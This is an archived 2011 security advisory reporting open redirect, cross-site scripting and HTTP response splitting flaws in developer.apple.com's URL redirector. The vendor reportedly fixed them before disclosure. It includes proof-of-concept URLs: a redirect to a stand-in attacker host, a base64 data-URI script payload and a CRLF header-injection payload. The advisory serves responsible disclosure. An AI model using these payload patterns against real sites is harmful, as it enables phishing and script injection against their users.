what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Apple Developer Cross Site Scripting / Redirect

Apple Developer Cross Site Scripting / Redirect
Posted Jul 1, 2011
Authored by Aung Khant | Site yehg.net

The Apple Developer site suffered from open redirect, cross site scripting, and http response splitting vulnerabilities.

tags | exploit, web, vulnerability, xss
systems | apple
SHA-256 | b29d8484d309dd75a2e3e792db03ef437624b98406e3757be16dee53f7a81233

Apple Developer Cross Site Scripting / Redirect

Change Mirror Download
Vulnerabilities via URL Redirector in developer.apple.com



1. VULNERABILITY DESCRIPTION

Arbitrary URL Redirect
======================

POC (Browsers: All)
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in/malware_exists_in_this_page

Issue References:
OWASP Top 10 A10 -
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 601 - http://cwe.mitre.org/data/definitions/601.html


Cross Site Scripting(XSS) Via Arbitrary URL Redirect
====================================================

POC (Browsers: Safari, Opera):
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3JpcHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D

Issue References:
OWASP Top 10 A2 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 79 - http://cwe.mitre.org/data/definitions/79.html


HTTP Response Splitting(HRS) Via Arbitrary URL Redirect
========================================================

https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in%0D%0ALocation%3A%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2089%0D%0A%0D%0A%3Chtml%3E%3Ctitle%3EThis%20page%20was%20hacked%3F%3C%2Ftitle%3E%3Ch1%3EThis%20page%20was%20hacked%3F%20-%20Not%20Really%3C%2Fh1%3E%3C!--

Issue References:
CWE 113 - http://cwe.mitre.org/data/definitions/113.html


Demo:
http://yehg.net/lab/pr0js/training/view/misc/Vulnerabilities%20Via%20Redirectors%20-%20developer.apple.com/


2. VENDOR

Apple Inc
http://www.apple.com


3. VULNERABILITY STATUS

FIXED


4. DISCLOSURE TIME-LINE

2011-04-25: reported vendor
2011-04-27: vendor replied "Thank you for forwarding this issue to us.
We take any report of a potential security issue
very seriously."
2011-06-29: vendor replied vulnerability was fixed
2011-07-01: vulnerability was disclosed


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/developer.apple.com/[apple-developer]_ur_xss_hrs


#yehg [2011-07-01]

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    38 Files
  • 24
    Sep 24th
    65 Files
  • 25
    Sep 25th
    24 Files
  • 26
    Sep 26th
    26 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close